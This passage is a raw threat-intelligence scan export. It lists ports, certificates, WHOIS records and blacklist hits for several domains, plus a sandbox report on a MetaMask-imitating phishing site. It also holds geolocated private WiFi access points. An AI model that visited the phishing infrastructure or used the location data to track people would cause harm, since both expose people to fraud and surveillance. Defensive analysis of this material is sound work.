Data\\Default\\AutofillStrikeDatabase\\LOG]- [targetUID: 00000000-00005828]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%TEMP%\\5828_1392880218\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00005828]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.41"\n Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': | 185.199.110.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SWKIDNEY1 (Net ID: 00:02:6F:ED:54:F6) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:54:16 | Web Content Type | No | Web Spider | 0 | 0 | 4 | 0 | None | application/javascript | https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:2052 | 188.114.96.1 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.118 | 34.148.97.127 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:8880 | 188.114.96.1 |
| 2023-05-12 03:09:27 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Aug 3 00:00:00 2022 GMT
Not After : Aug 2 23:59:59 2023 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee:
e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f:
17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77:
53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9:
9a:ab:1a:dd:7d
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90
X509v3 Subject Alternative Name:
DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Aug 3 19:12:00.178 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5:
28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27:
DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A:
25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F:
8A:70:C8:E6:BA:DA
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB:
B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C
Timestamp : Aug 3 19:12:00.017 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2:
F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94:
BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8:
22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA:
F5:C9:B6:E6:AF:CD:A6:FB
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09:
4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A
Timestamp : Aug 3 19:12:00.038 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91:
2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA:
EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED:
F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E:
8C:3E:16:39:2B:64:D1:78
Signature Algorithm: ecdsa-with-SHA256
30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c:
73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f:
c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c:
ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de
| 188.114.97.1 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00why00.github.io]
https://www.openphish.com/feed.txt | 00why00.github.io |
| 2023-05-12 03:00:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.26): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:18 | HTTP Headers | No | Web Spider | 2 | 0 | 2 | 0 | None | {"content-length": "1200", "content-encoding": "gzip", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "vary": "Accept-Encoding", "server": "Netlify", "etag": "\"10b11d9bef9ac1c17b1885f92638df3c-ssl-df\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:18 GMT", "x-nf-request-id": "01H06Y2WDQHNHJAAXWWVJBZZ5B", "content-type": "text/html; charset=UTF-8", "age": "0"} | pics.battleb0t.xyz |
| 2023-05-12 02:54:41 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.196.30.220:443 | 104.196.30.220 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet2EE2 (Net ID: 00:01:36:5B:2E:E0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:23:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.3:80 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Burfas10 (Net ID: 00:15:6D:A0:BD:ED) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Brown?s Living Room (Net ID: 00:19:9D:FF:D0:E3) | 32.8608, -79.9746 |
| 2023-05-12 02:44:09 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-12 05:22:09 | ayhu.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14806242599 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:55:05 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 188.114.97.1 |
| 2023-05-12 02:54:03 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c575ea9e94610e1-ORD
Content-Encoding: gzip
| 172.67.135.9 |
| 2023-05-12 03:03:39 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 01001101ck.github.io |
| 2023-05-12 02:58:22 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:18:ae:06:7e:fc:0b:78:46:5c:8b:fe:1a:31:bf:5b:16:b8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 17:51:43 2022 GMT
Not After : Mar 13 17:51:42 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d2:a8:d4:9f:a9:bd:76:f3:4e:fa:75:b4:78:5e:
d8:6a:71:e4:f3:f9:c2:77:fe:f9:7d:4c:da:66:22:
e0:cd:34:b7:7c:8d:14:1c:4d:7d:46:bd:0d:78:0c:
dd:5b:c4:ff:9f:13:d1:36:82:30:3b:b9:24:f9:65:
eb:d4:82:59:47:e9:be:2d:ca:25:2b:a1:b5:27:87:
63:33:e8:be:3d:46:8c:9b:0f:9e:b7:28:4d:eb:79:
63:20:73:aa:a3:d5:3d:c6:2e:b7:9c:7f:e7:f8:96:
79:6d:51:52:62:f7:cc:65:ca:dd:5b:ef:27:c9:9c:
81:e6:4a:8c:e9:e1:99:cd:79:f8:60:4b:a5:6b:6f:
c9:a2:fa:cc:0c:e7:34:b2:77:b5:de:bd:fe:24:a9:
e6:e9:26:4a:54:ec:0f:53:69:fc:a9:cb:fb:84:2e:
7d:af:75:b6:15:ef:6d:e3:fb:23:27:72:c7:fd:a8:
77:78:c9:f6:5b:6f:b1:0a:09:7c:e3:91:c1:95:13:
b4:4a:b2:6f:b1:ab:4c:4d:0b:11:8c:fd:8d:fb:d9:
37:66:3b:07:7b:cc:19:50:a2:89:0c:ea:8d:f1:d1:
b3:36:06:ad:51:15:23:e4:0c:43:f6:cc:90:55:fa:
98:c8:81:54:f2:2f:f7:d0:0b:4f:9f:38:a8:6c:71:
67:c5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
46:DD:F2:80:57:6C:FD:50:6F:F3:DF:3E:F6:D6:F8:E4:B9:2D:C4:6F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
b3:28:33:86:e5:dc:4a:a5:0d:54:63:88:53:14:c5:02:19:6c:
52:0c:eb:6c:53:81:1e:79:fa:32:9b:67:92:47:04:43:5c:50:
0d:d4:24:6a:dc:a8:66:3f:6f:01:46:76:6d:ab:41:86:f7:8a:
9f:a9:30:88:c8:3c:39:d0:93:9d:c0:84:21:71:d0:ed:5b:fd:
37:f1:e5:b1:17:44:f1:5d:0d:e3:ee:59:71:ab:af:ea:49:a9:
6f:46:0a:b8:4f:fb:b3:90:f5:22:5b:f7:15:85:47:7f:49:6f:
40:88:be:87:42:31:e5:73:5b:21:63:86:05:bf:5e:c7:08:7b:
22:bd:7c:ea:3c:10:5d:31:48:93:7d:11:b0:63:57:aa:ac:8f:
0e:e2:79:b2:0b:1e:4c:22:c3:9b:30:05:63:91:46:7c:08:bc:
0b:a5:df:0d:fa:d4:f5:ca:11:e2:c3:e9:3b:84:63:2a:e1:83:
23:69:5a:17:9e:82:bd:3e:38:bf:2f:e0:e7:d8:8e:1f:89:ec:
98:5e:98:15:2d:6f:da:3d:c3:ff:6f:27:47:e4:75:ff:0f:27:
54:ce:7a:dc:ed:b7:3c:34:cb:a9:19:03:70:2a:f8:d1:db:82:
d5:fe:f6:78:e7:00:e6:9d:bd:26:7b:70:c5:8a:f4:85:0a:5c:
ca:c5:68:7d
| ayhu.xyz |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.137): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:12 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | www.battleb0t.xyz |
| 2023-05-12 02:53:25 | Raw Data from RIRs | No | Hybrid Analysis | 1 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://math.pi/e,n=this.or.v,i=this.os.v,a=2*math.pi*n/(4*e),o=.5*-math.pi,s=3===this.data.d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://metamasko.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_b7c_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b7c_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_b7c_IE_EarlyTabStart_0xea4_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2940"\n "IsoScope_b7c_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_b7c_ConnHashTable<2940>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_b7c_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"154.82.100.186:80"\n "154.82.100.186:443"\n "172.217.12.106:443"\n "47.253.50.2:443"\n "142.250.191.42:443"\n "142.251.214.131:443"\n "43.251.41.15:443"\n "104.17.210.243:443"\n "142.250.191.67:443"\n "103.143.19.103:443"\n "104.17.213.243:443"\n "43.251.41.5:443"\n "208.89.12.90:443"\n "185.199.109.153:443"\n "208.89.12.87:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"metamasko.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"accdn.lpsnmedia.net"\n "ajax.googleapis.com"\n "collect-v6.51.la"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "forms.hsforms.com"\n "lpcdn.lpsnmedia.net"\n "lptag.liveperson.net"\n "metamask.io"\n "metamasko.com"\n "perf.hsforms.com"\n "sdk.51.la"\n "va.v.liveperson.net"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")\n Found string "<meta content="MetaMask - A crypto wallet & gateway to blockchain apps" property="twitter:title">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="A crypto wallet & gateway to blockchain apps" property="twitter:description">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="https://uploads-ssl.webflow.com/5b479ea1731aa13135a70342/5e6010110671f79d5c96adf9_open%20graph.png" property="twitter:image">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<meta content="summary_large_image" name="twitter:card">" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<div style="padding-top:56.17021276595745%" class="video w-video w-embed"><iframe class="embedly-embed" src="widgets/media.html" scrolling="no" title="YouTube embed" frameborder="0" allow="autoplay; fullscreen" allowfullscreen="true"></iframe></div>" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string "<a href="javascript:;" rel="noreferer\n noopener" target="_blank" class="footer-link">Twitter</a>" (Indicator: "dir "; File: "urlref_httpmetamasko.com")\n Found string ".w-widget-twitter {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim * {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim .w-widget-twitter-count-clear {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim.w--large .w-widget-twitter-count-inner {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical) {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before," (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):after {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical):before {" (Indicator: "dir "; File: "webflow_1_.css")\n Found string ".w-widget-twitter-count-shim:not(.w--vertical).w--large:before {" (Indicator: "dir "; File: "webflow_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Explore-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "wallet-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "Browse-illo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlref_httpmetamasko.com" as clean (type is "HTML document UTF-8 Unicode text with very long lines")\n Antivirus vendors marked dropped file "mm-logo_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF342.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarF3C1.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"hero2.2_1_.png" has type "PNG image data 1752 x 1452 8-bit/color RGBA non-interlaced" and extension "png"\n "mm-shop-hoodie_1_.png" has type "PNG image data 786 x 786 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-axieinfinity_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "payload_1_.jpg" has type "JPEG image data JFIF standard 1.02 aspect ratio density 1x1 segment length 16 baseline precision 8 450x450 components 3" and extension "jpg"\n "dapp-aave_1_.png" has type "PNG image data 560 x 560 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-compound_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-uniswap_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-gitcoin_1_.png" has type "PNG image data 280 x 280 8-bit/color RGBA non-interlaced" and extension "png"\n "dapp-maker_1_.png" has type "Unknown" and extension "png"\n "dapp-rarible_1_.png" has type "Unknown" and extension "png"\n "dapp-opensea_1_.png" has type "Unknown" and extension "png"\n "info_2x_1_.png" has type "Unknown" and extension "png"\n "refresh_2x_1_.png" has type "Unknown" and extension "png"\n "image_2x_1_.png" has type "Unknown" and extension "png"\n "undo_2x_1_.png" has type "Unknown" and extension "png"\n "audio_2x_1_.png" has type "Unknown" and extension "png"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 